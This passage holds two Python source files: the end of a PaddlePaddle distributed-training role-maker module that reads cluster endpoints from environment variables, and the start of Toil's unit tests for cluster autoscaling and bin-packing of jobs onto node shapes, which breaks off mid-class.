return self._nodes_num
def _get_trainer_endpoints(self):
"""
get endpoint of all trainers
"""
if not self._role_is_generated:
self._generate_role()
return self._worker_endpoints
def _get_pserver_endpoints(self):
"""
get endpoint of all pservers
"""
if not self._role_is_generated:
self._generate_role()
return self._server_endpoints
def _is_non_distributed(self):
"""
Return True if indispensable environment for fleetrun is not found
(use python-run to launch fleet-code directly)
"""
if not self._role_is_generated:
self._generate_role()
return self._non_distributed
def _heter_worker_num(self):
"""
get heter worker nums
"""
if not self._role_is_generated:
self._generate_role()
return self._heter_trainers_num
def _is_heter_worker(self):
"""
whether current process is heter worker
"""
if not self._role_is_generated:
self._generate_role()
return self._role == Role.HETER_WORKER
def _ps_env(self):
try:
# Environment variable PADDLE_PSERVERS_IP_PORT_LIST must be set
# format: string(ip:port,ip:port), eg. 127.0.0.1:6001,127.0.0.1:6002
self._server_endpoints = os.getenv("PADDLE_PSERVERS_IP_PORT_LIST")
if self._server_endpoints is None:
# back to non_distributed execution.
self._server_endpoints = ""
self._trainers_num = 1
self._role = Role.WORKER
self._current_id = 0
self._nodes_num = 1
self._heter_trainers_num = 0
self._heter_trainer_endpoints = None
self._non_distributed = True
return
self._server_endpoints = self._server_endpoints.split(",")
self._worker_endpoints = os.getenv("PADDLE_TRAINER_ENDPOINTS")
if self._worker_endpoints:
self._worker_endpoints = self._worker_endpoints.split(",")
else:
self._worker_endpoints = []
trainers_num = int(os.environ["PADDLE_TRAINERS_NUM"])
training_role = os.environ["TRAINING_ROLE"]
if training_role not in ["TRAINER", "PSERVER", "HETER_TRAINER"]:
raise ValueError(
"TRAINING_ROLE must be PSERVER or TRAINER or HETER_TRAINER, but get {}, please check your environment.".
format(training_role))
# For heter parameter server env setting
heter_trainer_eplist = os.getenv(
"PADDLE_HETER_TRAINER_IP_PORT_LIST", None)
heter_trainer_device = os.getenv("PADDLE_HETER_TRAINER_DEVICE",
None)
if heter_trainer_eplist and heter_trainer_device:
try:
heter_trainer_eplist = os.environ[
"PADDLE_HETER_TRAINER_IP_PORT_LIST"].split(",")
except:
raise ValueError(
"Can not Find PADDLE_HETER_TRAINER_IP_PORT_LIST in env or its format doesn't match the requirement: 'IP:PORT,IP:PORT' ."
)
self._is_heter_parameter_server_mode = True
heter_trainers_num = len(heter_trainer_eplist)
current_node_device = heter_trainer_device.upper()
if current_node_device not in ["CPU", "GPU", "XPU"]:
raise ValueError(
"Heter Trainer doesn't support {} device now, please use CPU / GPU / XPU(KunLun)".
format(heter_trainer_device))
self._heter_trainer_device = current_node_device
else:
self._is_heter_parameter_server_mode = False
heter_trainers_num = 0
if training_role == "TRAINER":
role = Role.WORKER
current_id = int(os.environ["PADDLE_TRAINER_ID"])
if len(self._worker_endpoints) > 0:
self._cur_endpoint = self._worker_endpoints[current_id]
elif training_role == "PSERVER":
role = Role.SERVER
port = os.environ["PADDLE_PORT"]
ip = os.environ["POD_IP"]
self._cur_endpoint = ip + ":" + port
current_id = self._server_endpoints.index(self._cur_endpoint)
elif training_role == "HETER_TRAINER":
role = Role.HETER_WORKER
cur_ip = os.environ["POD_IP"]
cur_port = os.environ["PADDLE_PORT"]
curr_endpoint = ":".join([cur_ip, cur_port])
current_id = heter_trainer_eplist.index(curr_endpoint)
else:
raise ValueError(
"TRAINING_ROLE must be PSERVER or TRAINER or HETER_TRAINER")
except ValueError as e:
raise ValueError(
"Something wrong with PaddleCloud, please check environment")
self._trainers_num = trainers_num
self._role = role
self._current_id = current_id
self._nodes_num = len(
set([x.split(':')[0] for x in self._worker_endpoints]))
self._heter_trainers_num = heter_trainers_num
self._heter_trainer_endpoints = heter_trainer_eplist
def _collective_env(self):
self._current_id = int(os.getenv("PADDLE_TRAINER_ID", "0"))
self._training_role = os.getenv("PADDLE_TRAINING_ROLE", "TRAINER")
assert (self._training_role == "TRAINER")
self._role = Role.WORKER
self._worker_endpoints = os.getenv("PADDLE_TRAINER_ENDPOINTS")
self._cur_endpoint = os.getenv("PADDLE_CURRENT_ENDPOINT")
if self._worker_endpoints is None:
# back to non_distributed execution.
self._worker_endpoints = "127.0.0.1:6170"
self._cur_endpoint = self._worker_endpoints
self._non_distributed = True
self._worker_endpoints = self._worker_endpoints.split(",")
self._trainers_num = len(self._worker_endpoints)
self._nodes_num = len(
set([x.split(':')[0] for x in self._worker_endpoints]))
def _gloo_init(self):
# PADDLE_WITH_GLOO 1: trainer barrier, 2: all barrier
use_gloo = int(os.getenv("PADDLE_WITH_GLOO", "0"))
if use_gloo not in [1, 2]:
return
# PADDLE_GLOO_RENDEZVOUS 1: HDFS 2: FILE 3: HTTP
rendezvous_type = int(os.getenv("PADDLE_GLOO_RENDEZVOUS", "0"))
prefix = os.getenv("SYS_JOB_ID", "")
if rendezvous_type not in [
Gloo.RENDEZVOUS.HDFS, Gloo.RENDEZVOUS.HTTP, Gloo.RENDEZVOUS.FILE
]:
raise ValueError(self._gloo._err_type)
need_init_all = True if use_gloo == 2 else False
if rendezvous_type == Gloo.RENDEZVOUS.HDFS:
dfs_name = os.getenv("PADDLE_GLOO_FS_NAME", "")
dfs_ugi = os.getenv("PADDLE_GLOO_FS_UGI", "")
dfs_path = os.getenv("PADDLE_GLOO_FS_PATH", "")
kwargs = {
"dfs.name": dfs_name,
"dfs.ugi": dfs_ugi,
"dfs.path": dfs_path,
"store.prefix": prefix,
}
elif rendezvous_type == Gloo.RENDEZVOUS.HTTP:
start_http_server = False
manager = Manager()
http_server_d = manager.dict()
http_server_d["running"] = False
if self._is_collective:
ep_rank_0 = self._worker_endpoints[0]
if self._is_first_worker():
start_http_server = True
else:
ep_rank_0 = self._server_endpoints[0]
if self._server_index() == 0:
start_http_server = True
ip, port = ep_rank_0.split(':')
kwargs = {
"http.host": ip,
"http.port": port,
"store.prefix": prefix,
'start_http_server': start_http_server,
'http_server_d': http_server_d,
}
else:
dfs_path = os.getenv("PADDLE_GLOO_FS_PATH", "")
kwargs = {
"dfs.path": dfs_path,
"store.prefix": prefix,
}
if rendezvous_type == Gloo.RENDEZVOUS.HDFS:
type = "HDFS"
elif rendezvous_type == Gloo.RENDEZVOUS.HTTP:
type = "HTTP"
else:
type = "FILE"
print("Gloo init with {}: need_init_all: {}, args: {}".format(
type, need_init_all, kwargs))
self._gloo.init(
rendezvous=rendezvous_type,
role=self._role,
role_id=self._role_id(),
worker_num=self._worker_num(),
server_num=self._server_num(),
need_init_all=need_init_all,
kwargs=kwargs)
if rendezvous_type == Gloo.RENDEZVOUS.HTTP:
http_server_d['running'] = False
def _generate_role(self):
"""
generate role for role maker
"""
if not self._role_is_generated:
if not self._is_collective:
self._ps_env()
else:
self._collective_env()
self._role_is_generated = True
if not paddle.fluid.framework.in_dygraph_mode():
self._gloo_init()
class UserDefinedRoleMaker(PaddleCloudRoleMaker):
def __init__(self, is_collective=False, init_gloo=False, **kwargs):
super(UserDefinedRoleMaker, self).__init__(
is_collective=is_collective, init_gloo=init_gloo, **kwargs)
self._init_gloo = init_gloo
def _user_defined_ps_env(self):
self._server_endpoints = self._kwargs.get("server_endpoints")
self._worker_endpoints = self._kwargs.get("worker_endpoints", [])
self._trainers_num = self._kwargs.get("worker_num", 0)
if self._trainers_num == 0:
assert (len(self._worker_endpoints) > 0)
self._trainers_num = len(self._worker_endpoints)
self._role = self._kwargs.get("role")
self._current_id = self._kwargs.get("current_id")
if self._role == Role.WORKER and len(
self._worker_endpoints) > self._current_id:
self._cur_endpoint = self._worker_endpoints[self._current_id]
elif self._role == Role.SERVER:
self._cur_endpoint = self._server_endpoints[self._current_id]
self._nodes_num = len(
set([x.split(':')[0] for x in self._worker_endpoints]))
def _user_defined_collective_env(self):
self._worker_endpoints = self._kwargs.get("worker_endpoints")
self._current_id = self._kwargs.get("current_id")
self._trainers_num = len(self._worker_endpoints)
self._training_role = Role.WORKER
self._nodes_num = len(
set([x.split(':')[0] for x in self._worker_endpoints]))
def _generate_role(self):
"""
generate role for role maker
"""
if not self._role_is_generated:
if not self._is_collective:
self._user_defined_ps_env()
else:
self._user_defined_collective_env()
self._role_is_generated = True
|
clusterScalerTest.py
|
# Copyright (C) 2015-2018 Regents of the University of California
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
from __future__ import division
from builtins import map
from builtins import object
from builtins import range
from past.utils import old_div
import time
import datetime
from contextlib import contextmanager
from threading import Thread, Event
import logging
import random
import types
import uuid
from collections import defaultdict
from mock import MagicMock
# Python 3 compatibility imports
from six.moves.queue import Empty, Queue
from six import iteritems
from toil.job import JobNode, Job
from toil.lib.humanize import human2bytes as h2b
from toil.test import ToilTest, slow, travis_test
from toil.batchSystems.abstractBatchSystem import (AbstractScalableBatchSystem,
NodeInfo,
AbstractBatchSystem)
from toil.provisioners.node import Node
from toil.provisioners.abstractProvisioner import AbstractProvisioner, Shape
from toil.provisioners.clusterScaler import (ClusterScaler,
ScalerThread,
BinPackedFit,
NodeReservation)
from toil.common import Config, defaultTargetTime
logger = logging.getLogger(__name__)
# simplified c4.8xlarge (preemptable)
c4_8xlarge_preemptable = Shape(wallTime=3600,
memory=h2b('60G'),
cores=36,
disk=h2b('100G'),
preemptable=True)
# simplified c4.8xlarge (non-preemptable)
c4_8xlarge = Shape(wallTime=3600,
memory=h2b('60G'),
cores=36,
disk=h2b('100G'),
preemptable=False)
# simplified r3.8xlarge (non-preemptable)
r3_8xlarge = Shape(wallTime=3600,
memory=h2b('260G'),
cores=32,
disk=h2b('600G'),
preemptable=False)
# simplified t2.micro (non-preemptable)
t2_micro = Shape(wallTime=3600,
memory=h2b('1G'),
cores=1,
disk=h2b('8G'),
preemptable=False)
class BinPackingTest(ToilTest):
def setUp(self):
self.nodeShapes = [c4_8xlarge_preemptable, r3_8xlarge]
self.bpf = BinPackedFit(self.nodeShapes)
@travis_test
def testPackingOneShape(self):
"""Pack one shape and check that the resulting reservations look sane."""
self.bpf.nodeReservations[c4_8xlarge_preemptable] = [NodeReservation(c4_8xlarge_preemptable)]
self.bpf.addJobShape(Shape(wallTime=1000,
cores=2,
memory=h2b('1G'),
disk=h2b('2G'),
preemptable=True))
self.assertEqual(self.bpf.nodeReservations[r3_8xlarge], [])
self.assertEqual([x.shapes() for x in self.bpf.nodeReservations[c4_8xlarge_preemptable]],
[[Shape(wallTime=1000,
memory=h2b('59G'),
cores=34,
disk=h2b('98G'),
preemptable=True),
Shape(wallTime=2600,
memory=h2b('60G'),
cores=36,
disk=h2b('100G'),
preemptable=True)]])
@travis_test
def testSorting(self):
"""
Test that sorting is correct: preemptable, then memory, then cores, then disk,
then wallTime.
"""
shapeList = [c4_8xlarge_preemptable, r3_8xlarge, c4_8xlarge, c4_8xlarge,
t2_micro, t2_micro, c4_8xlarge, r3_8xlarge, r3_8xlarge, t2_micro]
shapeList.sort()
assert shapeList == [c4_8xlarge_preemptable,
t2_micro, t2_micro, t2_micro,
c4_8xlarge, c4_8xlarge, c4_8xlarge,
r3_8xlarge, r3_8xlarge, r3_8xlarge]
@travis_test
def testAddingInitialNode(self):
"""Pack one shape when no nodes are available and confirm that we fit one node properly."""
self.bpf.addJobShape(Shape(wallTime=1000,
cores=2,
memory=h2b('1G'),
disk=h2b('2G'),
preemptable=True))
self.assertEqual([x.shapes() for x in self.bpf.nodeReservations[c4_8xlarge_preemptable]],
[[Shape(wallTime=1000,
memory=h2b('59G'),
cores=34,
disk=h2b('98G'),
preemptable=True),
Shape(wallTime=2600,
memory=h2b('60G'),
cores=36,
disk=h2b('100G'),
preemptable=True)]])
@travis_test
def testLowTargetTime(self):
"""
Test that a low targetTime (0) parallelizes jobs aggressively (1000 queued jobs require
1000 nodes).
Ideally, low targetTime means: Start quickly and maximize parallelization after the
cpu/disk/mem have been packed.
Disk/cpu/mem packing is prioritized first, so we set job resource reqs so that each
t2.micro (1 cpu/8G disk/1G RAM) can only run one job at a time with its resources.
Each job is parametrized to take 300 seconds, so (the minimum of) 1 of them should fit into
each node's 0 second window, so we expect 1000 nodes.
"""
allocation = self.run1000JobsOnMicros(jobCores=1,
jobMem=h2b('1G'),
jobDisk=h2b('1G'),
jobTime=300,
globalTargetTime=0)
self.assertEqual(allocation, {t2_micro: 1000})
@travis_test
def testHighTargetTime(self):
"""
Test that a high targetTime (3600 seconds) maximizes packing within the targetTime.
Ideally, high targetTime means: Maximize packing within the targetTime after the
cpu/disk/mem have been packed.
Disk/cpu/mem packing is prioritized first, so we set job resource reqs so that each
t2.micro (1 cpu/8G disk/1G RAM) can only run one job at a time with its resources.
Each job is parametrized to take 300 seconds, so 12 of them should fit into each node's
3600 second window. 1000/12 = 83.33, so we expect 84 nodes.
"""
allocation = self.run1000JobsOnMicros(jobCores=1,
jobMem=h2b('1G'),
jobDisk=h2b('1G'),
jobTime=300,
globalTargetTime=3600)
self.assertEqual(allocation, {t2_micro: 84})
@travis_test
def testZeroResourceJobs(self):
"""
Test that jobs requiring zero cpu/disk/mem pack first, regardless of targetTime.
Disk/cpu/mem packing is prioritized first, so we set job resource reqs so that each
t2.micro (1 cpu/8G disk/1G RAM) can run a seemingly infinite number of jobs with its
resources.
Since all jobs should pack cpu/disk/mem-wise on a t2.micro, we expect only one t2.micro to
be provisioned. If we raise this, as in testLowTargetTime, it will launch 1000 t2.micros.
"""
allocation = self.run1000JobsOnMicros(jobCores=0,
jobMem=0,
jobDisk=0,
jobTime=300,
globalTargetTime=0)
self.assertEqual(allocation, {t2_micro: 1})
@travis_test
def testLongRunningJobs(self):
"""
Test that jobs with long run times (especially service jobs) are aggressively parallelized.
This is important, because services are one case where the degree of parallelization
really, really matters. If you have multiple services, they may all need to be running
simultaneously before any real work can be done.
Despite setting globalTargetTime=3600, this should launch 1000 t2.micros because each job's
estimated runtime (30000 seconds) extends well beyond 3600 seconds.
"""
allocation = self.run1000JobsOnMicros(jobCores=1,
jobMem=h2b('1G'),
jobDisk=h2b('1G'),
jobTime=30000,
globalTargetTime=3600)
self.assertEqual(allocation, {t2_micro: 1000})
def run1000JobsOnMicros(self, jobCores, jobMem, jobDisk, jobTime, globalTargetTime):
"""Test packing 1000 jobs on t2.micros. Depending on the targetTime and resources,
these should pack differently.
"""
nodeShapes = [t2_micro]
bpf = BinPackedFit(nodeShapes, targetTime=globalTargetTime)
for _ in range(1000):
bpf.addJobShape(Shape(wallTime=jobTime,
memory=jobMem,
cores=jobCores,
disk=jobDisk,
preemptable=False))
return bpf.getRequiredNodes()
@travis_test
def testPathologicalCase(self):
"""Test a pathological case where only one node can be requested to fit months' worth of jobs.
If the reservation is extended to fit a long job, and the
bin-packer naively searches through all the reservation slices
to find the first slice that fits, it will happily assign the
first slot that fits the job, even if that slot occurs days in
the future.
"""
# Add one job that partially fills an r3.8xlarge for 1000 hours
self.bpf.addJobShape(Shape(wallTime=3600000,
memory=h2b('10G'),
cores=0,
disk=h2b('10G'),
preemptable=False))
for _ in range(500):
# Add 500 CPU-hours worth of jobs that fill an r3.8xlarge
self.bpf.addJobShape(Shape(wallTime=3600,
memory=h2b('26G'),
cores=32,
disk=h2b('60G'),
preemptable=False))
# Hopefully we didn't assign just one node to cover all those jobs.
self.assertNotEqual(self.bpf.getRequiredNodes(), {r3_8xlarge: 1, c4_8xlarge_preemptable: 0})
@travis_test
def testJobTooLargeForAllNodes(self):
"""
If a job is too large for all node types, the scaler should print a
warning, but definitely not crash.
"""
# Takes more RAM than an r3.8xlarge
largerThanR3 = Shape(wallTime=3600,
memory=h2b('360G'),
cores=32,
disk=h2b('600G'),
preemptable=False)
self.bpf.addJobShape(largerThanR3)
# If we got here we didn't crash.
class ClusterScalerTest(ToilTest):
def setUp(self):
super(ClusterScalerTest, self).setUp()
self.config = Config()
self.config.targetTime = 1800
self.config.nodeTypes = ['r3.8xlarge', 'c4.8xlarge:0.6']
# Set up a stub provisioner with some nodeTypes and nodeShapes.
try:
# In Python 3 we can use a SimpleNamespace as a mock provisioner
self.provisioner = types.SimpleNamespace()
except:
# In Python 2 we can just tack fields onto an object
self.provisioner = object()
setattr(self.provisioner, 'nodeTypes', ['r3.8xlarge', 'c4.8xlarge'])
setattr(self.provisioner, 'nodeShapes', [r3_8xlarge,
c4_8xlarge_preemptable])
setattr(self.provisioner, 'setStaticNodes', lambda _, __: None)
setattr(self.provisioner, 'retryPredicate', lambda _: False)
self.leader = MockBatchSystemAndProvisioner(self.config, 1)
@travis_test
def testRounding(self):
"""
Test to make sure the ClusterScaler's rounding rounds properly.
"""
# Get a ClusterScaler
self.config.targetTime = 1
self.config.betaInertia = 0.0
self.config.maxNodes = [2, 3]
scaler = ClusterScaler(self.provisioner, self.leader, self.config)
# Exact integers round to themselves
self.assertEqual(scaler._round(0.0), 0)
self.assertEqual(scaler._round(1.0), 1)
self.assertEqual(scaler._round(-1.0), -1)
self.assertEqual(scaler._round(123456789101112.13), 123456789101112)
# Decimals other than X.5 round to the side they are closer to
self.assertEqual(scaler._round(1E-10), 0)
self.assertEqual(scaler._round(0.5 + 1E-15), 1)
self.assertEqual(scaler._round(-0.9), -1)
self.assertEqual(scaler._round(-0.4), 0)
# Decimals at exactly X.5 round away from 0
self.assertEqual(scaler._round(0.5), 1)
self.assertEqual(scaler._round(-0.5), -1)
self.assertEqual(scaler._round(2.5), 3)
self.assertEqual(scaler._round(-2.5), -3)
self.assertEqual(scaler._round(15.5), 16)
self.assertEqual(scaler._round(-15.5), -16)
self.assertEqual(scaler._round(123456789101112.5), 123456789101113)
@travis_test
def testMaxNodes(self):
"""
Set the scaler to be very aggressive, give it a ton of jobs, and
make sure it doesn't go over maxNodes.
"""
self.config.targetTime = 1
self.config.betaInertia = 0.0
self.config.maxNodes = [2, 3]
scaler = ClusterScaler(self.provisioner, self.leader, self.config)
jobShapes = [Shape(wallTime=3600,
cores=2,
memory=h2b('1G'),
disk=h2b('2G'),
preemptable=True)] * 1000
jobShapes.extend([Shape(wallTime=3600,
cores=2,
memory=h2b('1G'),
disk=h2b('2G'),
preemptable=False)] * 1000)
estimatedNodeCounts = scaler.getEstimatedNodeCounts(jobShapes, defaultdict(int))
self.assertEqual(estimatedNodeCounts[r3_8xlarge], 2)
self.assertEqual(estimatedNodeCounts[c4_8xlarge_preemptable], 3)
@travis_test
def testMinNodes(self):
"""
Without any jobs queued, the scaler should still estimate "minNodes" nodes.
"""
self.config.betaInertia = 0.0
self.config.minNodes = [2, 3]
scaler = ClusterScaler(self.provisioner, self.leader, self.config)
jobShapes = []
estimatedNodeCounts = scaler.getEstimatedNodeCounts(jobShapes, defaultdict(int))
self.assertEqual(estimatedNodeCounts[r3_8xlarge], 2)
self.assertEqual(estimatedNodeCounts[c4_8xlarge_preemptable], 3)
@travis_test
def testPreemptableDeficitResponse(self):
"""
When a preemptable deficit was detected by a previous run of the
loop, the scaler should add non-preemptable nodes to
compensate in proportion to preemptableCompensation.
"""
self.config.targetTime = 1
self.config.betaInertia = 0.0
self.config.maxNodes = [10, 10]
# This should mean that one non-preemptable node is launched
# for every two preemptable nodes "missing".
self.config.preemptableCompensation = 0.5
# In this case, we want to explicitly set up the config so
# that we can have preemptable and non-preemptable nodes of
# the same type. That is the only situation where
# preemptableCompensation applies.
self.config.nodeTypes = ['c4.8xlarge:0.6', 'c4.8xlarge']
self.provisioner.nodeTypes = ['c4.8xlarge', 'c4.8xlarge']
self.provisioner.nodeShapes = [c4_8xlarge_preemptable,
c4_8xlarge]
scaler = ClusterScaler(self.provisioner, self.leader, self.config)
# Simulate a situation where a previous run caused a
# "deficit" of 5 preemptable nodes (e.g. a spot bid was lost)
scaler.preemptableNodeDeficit['c4.8xlarge'] = 5
# Add a bunch of preemptable jobs (so the bin-packing
# estimate for the non-preemptable node should still be 0)
jobShapes = [Shape(wallTime=3600,
cores=2,
memory=h2b('1G'),
disk=h2b('2G'),
preemptable=True)] * 1000
estimatedNodeCounts = scaler.getEstimatedNodeCounts(jobShapes, defaultdict(int))
# We don't care about the estimated size of the preemptable
# nodes. All we want to know is if we responded to the deficit
# properly: 0.5 * 5 (preemptableCompensation * the deficit) = 3 (rounded up).
self.assertEqual(estimatedNodeCounts[self.provisioner.nodeShapes[1]], 3)
@travis_test
def testPreemptableDeficitIsSet(self):
"""
Make sure that updateClusterSize sets the preemptable deficit if
it can't launch preemptable nodes properly. That way, the
deficit can be communicated to the next run of
estimateNodeCount.
"""
# Mock out addNodes. We want to pretend it had trouble
# launching all 5 nodes, and could only launch 3.
self.provisioner.addNodes = MagicMock(return_value=3)
# Pretend there are no nodes in the cluster right now
self.provisioner.getProvisionedWorkers = MagicMock(return_value=[])
# In this case, we want to explicitly set up the config so
# that we can have preemptable and non-preemptable nodes of
# the same type. That is the only situation where
# preemptableCompensation applies.
self.config.nodeTypes = ['c4.8xlarge:0.6', 'c4.8xlarge']
self.provisioner.nodeTypes = ['c4.8xlarge', 'c4.8xlarge']
self.provisioner.nodeShapes = [c4_8xlarge_preemptable,
c4_8xlarge]
scaler = ClusterScaler(self.provisioner, self.leader, self.config)
estimatedNodeCounts = {c4_8xlarge_preemptable: 5, c4_8xlarge: 0}
scaler.updateClusterSize(estimatedNodeCounts)
self.assertEqual(scaler.preemptableNodeDeficit['c4.8xlarge'], 2)
self.provisioner.addNodes.assert_called_once()
# OK, now pretend this is a while later, and actually launched
# the nodes properly. The deficit should disappear
self.provisioner.addNodes = MagicMock(return_value=5)
scaler.updateClusterSize(estimatedNodeCounts)
self.assertEqual(scaler.preemptableNodeDeficit['c4.8xlarge'], 0)
@travis_test
def testNoLaunchingIfDeltaAlreadyMet(self):
"""
Check that the scaler doesn't try to launch "0" more instances if
the delta was able to be met by unignoring nodes.
"""
# We have only one node type for simplicity
self.provisioner.nodeTypes = ['c4.8xlarge']
self.provisioner.nodeShapes = [c4_8xlarge]
scaler = ClusterScaler(self.provisioner, self.leader, self.config)
# Pretend there is one ignored worker in the cluster
self.provisioner.getProvisionedWorkers = MagicMock(
return_value=[Node('127.0.0.1', '127.0.0.1', 'testNode',
datetime.datetime.now().isoformat(),
nodeType='c4.8xlarge', preemptable=True)])
scaler.ignoredNodes.add('127.0.0.1')
# Exercise the updateClusterSize logic
self.provisioner.addNodes = MagicMock()
scaler.updateClusterSize({c4_8xlarge: 1})
self.assertFalse(self.provisioner.addNodes.called,
"addNodes was called when no new nodes were needed")
self.assertEqual(len(scaler.ignoredNodes), 0,
"The scaler didn't unignore an ignored node when "
"scaling up")
@travis_test
def testBetaInertia(self):
# This is really high, but makes things easy to calculate.
self.config.betaInertia = 0.5
scaler = ClusterScaler(self.provisioner, self.leader, self.config)
# OK, smoothing things this much should get us 50% of the way to 100.
self.assertEqual(scaler.smoothEstimate(c4_8xlarge_preemptable, 100), 50)
# Now we should be at 75%.
self.assertEqual(scaler.smoothEstimate(c4_8xlarge_preemptable, 100), 75)
# We should eventually converge on our estimate as long as betaInertia is below 1.
for _ in range(1000):
scaler.smoothEstimate(c4_8xlarge_preemptable, 100)
self.assertEqual(scaler.smoothEstimate(c4_8xlarge_preemptable, 100), 100)
class ScalerThreadTest(ToilTest):
def _testClusterScaling(self, config, numJobs, numPreemptableJobs, jobShape):
"""
Test the ClusterScaler class with different patterns of job creation. Tests ascertain that
autoscaling occurs and that all the jobs are run.
"""
# First do simple test of creating 100 preemptable and non-premptable jobs and check the
# jobs are completed okay, then print the amount of worker time expended and the total
# number of worker nodes used.
mock = MockBatchSystemAndProvisioner(config, secondsPerJob=2.0)
mock.start()
clusterScaler = ScalerThread(mock, mock, config)
clusterScaler.start()
try:
# Add 100 jobs to complete
list(map(lambda x: mock.addJob(jobShape=jobShape),
list(range(numJobs))))
list(map(lambda x: mock.addJob(jobShape=jobShape, preemptable=True),
list(range(numPreemptableJobs))))
# Add some completed jobs
for preemptable in (True, False):
if preemptable and numPreemptableJobs > 0 or not preemptable and numJobs > 0:
# Add 1000 random jobs
for _ in range(1000):
x = mock.getNodeShape(nodeType=jobShape)
iJ = JobNode(jobStoreID=1,
requirements=dict(
memory=random.choice(list(range(1, x.memory))),
cores=random.choice(list(range(1, x.cores))),
disk=random.choice(list(range(1, x.disk))),
preemptable=preemptable),
command=None,
jobName='testClusterScaling', unitName='')
clusterScaler.addCompletedJob(iJ, random.choice(list(range(1, x.wallTime))))
startTime = time.time()
# Wait while the cluster processes the jobs
while (mock.getNumberOfJobsIssued(preemptable=False) > 0
or mock.getNumberOfJobsIssued(preemptable=True) > 0
or mock.getNumberOfNodes() > 0 or mock.getNumberOfNodes(preemptable=True) > 0):
logger.debug("Running, non-preemptable queue size: %s, non-preemptable workers: %s, "
"preemptable queue size: %s, preemptable workers: %s" %
(mock.getNumberOfJobsIssued(preemptable=False),
mock.getNumberOfNodes(preemptable=False),
mock.getNumberOfJobsIssued(preemptable=True),
mock.getNumberOfNodes(preemptable=True)))
clusterScaler.check()
time.sleep(0.5)
logger.debug("We waited %s for cluster to finish" % (time.time() - startTime))
finally:
clusterScaler.shutdown()
mock.shutDown()
# Print some info about the autoscaling
logger.debug("Total-jobs: %s: Max-workers: %s, "
"Total-worker-time: %s, Worker-time-per-job: %s" %
(mock.totalJobs, sum(mock.maxWorkers.values()),
mock.totalWorkerTime,
old_div(mock.totalWorkerTime, mock.totalJobs) if mock.totalJobs > 0 else 0.0))
@slow
def testClusterScaling(self):
"""
Test scaling for a batch of non-preemptable jobs and no preemptable jobs (makes debugging
easier).
"""
config = Config()
# Make defaults dummy values
config.defaultMemory = 1
config.defaultCores = 1
config.defaultDisk = 1
# No preemptable nodes/jobs
config.maxPreemptableNodes = [] # No preemptable nodes
# Non-preemptable parameters
config.nodeTypes = [Shape(20, 10, 10, 10, False)]
config.minNodes = [0]
config.maxNodes = [10]
# Algorithm parameters
config.targetTime = defaultTargetTime
config.betaInertia = 0.1
config.scaleInterval = 3
self._testClusterScaling(config, numJobs=100, numPreemptableJobs=0,
jobShape=config.nodeTypes[0])
@slow
def testClusterScalingMultipleNodeTypes(self):
smallNode = Shape(20, 5, 10, 10, False)
mediumNode = Shape(20, 10, 10, 10, False)
largeNode = Shape(20, 20, 10, 10, False)
numJobs = 100
config = Config()
# Make defaults dummy values
config.defaultMemory = 1
config.defaultCores = 1
config.defaultDisk = 1
# No preemptable nodes/jobs
config.preemptableNodeTypes = []
config.minPreemptableNodes = []
config.maxPreemptableNodes = [] # No preemptable nodes
# Make sure the node types don't have to be ordered
config.nodeTypes = [largeNode, smallNode, mediumNode]
config.minNodes = [0, 0, 0]
config.maxNodes = [10, 10] # test expansion of this list
# Algorithm parameters
config.targetTime = defaultTargetTime
config.betaInertia = 0.1
config.scaleInterval = 3
mock = MockBatchSystemAndProvisioner(config, secondsPerJob=2.0)
clusterScaler = ScalerThread(mock, mock, config)
clusterScaler.start()
mock.start()
try:
# Add small jobs
list(map(lambda x: mock.addJob(jobShape=smallNode), list(range(numJobs))))
list(map(lambda x: mock.addJob(jobShape=mediumNode), list(range(numJobs))))
# Add medium completed jobs
for i in range(1000):
iJ = JobNode(jobStoreID=1,
requirements=dict(
memory=random.choice(range(smallNode.memory, mediumNode.memory)),
cores=mediumNode.cores,
disk=largeNode.cores,
preemptable=False),
command=None,
jobName='testClusterScaling', unitName='')
clusterScaler.addCompletedJob(iJ, random.choice(range(1, 10)))
while mock.getNumberOfJobsIssued() > 0 or mock.getNumberOfNodes() > 0:
logger.debug("%i nodes currently provisioned" % mock.getNumberOfNodes())
# Make sure there are no large nodes
self.assertEqual(mock.getNumberOfNodes(nodeType=largeNode), 0)
clusterScaler.check()
time.sleep(0.5)
finally:
clusterScaler.shutdown()
mock.shutDown()
# Make sure jobs ran on both the small and medium node types
self.assertTrue(mock.totalJobs > 0)
self.assertTrue(mock.maxWorkers[smallNode] > 0)
self.assertTrue(mock.maxWorkers[mediumNode] > 0)
self.assertEqual(mock.maxWorkers[largeNode], 0)
@slow
def testClusterScalingWithPreemptableJobs(self):
"""
Test scaling simultaneously for a batch of preemptable and non-preemptable jobs.
"""
config = Config()
jobShape = Shape(20, 10, 10, 10, False)
preemptableJobShape = Shape(20, 10, 10, 10, True)
# Make defaults dummy values
config.defaultMemory = 1
config.defaultCores = 1
config.defaultDisk = 1
# non-preemptable node parameters
config.nodeTypes = [jobShape, preemptableJobShape]
config.minNodes = [0, 0]
config.maxNodes = [10, 10]
# Algorithm parameters
config.targetTime = defaultTargetTime
config.betaInertia = 0.9
config.scaleInterval = 3
self._testClusterScaling(config, numJobs=100, numPreemptableJobs=100, jobShape=jobShape)
# noinspection PyAbstractClass
class MockBatchSystemAndProvisioner(AbstractScalableBatchSystem, AbstractProvisioner):
"""
Mimics a job batcher, provisioner and scalable batch system
"""
def __init__(self, config, secondsPerJob):
super(MockBatchSystemAndProvisioner, self).__init__('clusterName')
# To mimic parallel preemptable and non-preemptable queues
# for jobs we create two parallel instances of the following class
self.config = config
self.secondsPerJob = secondsPerJob
self.provisioner = self
self.batchSystem = self
self.nodeTypes = config.nodeTypes
self.nodeShapes = self.nodeTypes
self.nodeShapes.sort()
self.jobQueue = Queue()
self.updatedJobsQueue = Queue()
self.jobBatchSystemIDToIssuedJob = {}
self.totalJobs = 0 # Count of total jobs processed
self.totalWorkerTime = 0.0 # Total time spent in worker threads
self.toilMetrics = None
self.nodesToWorker = {} # Map from Node to instances of the Worker class
self.workers = {nodeShape: [] for nodeShape in
self.nodeShapes} # Instances of the Worker class
self.maxWorkers = {nodeShape: 0 for nodeShape in
self.nodeShapes} # Maximum number of workers
self.running = False
self.leaderThread = Thread(target=self._leaderFn)
def start(self):
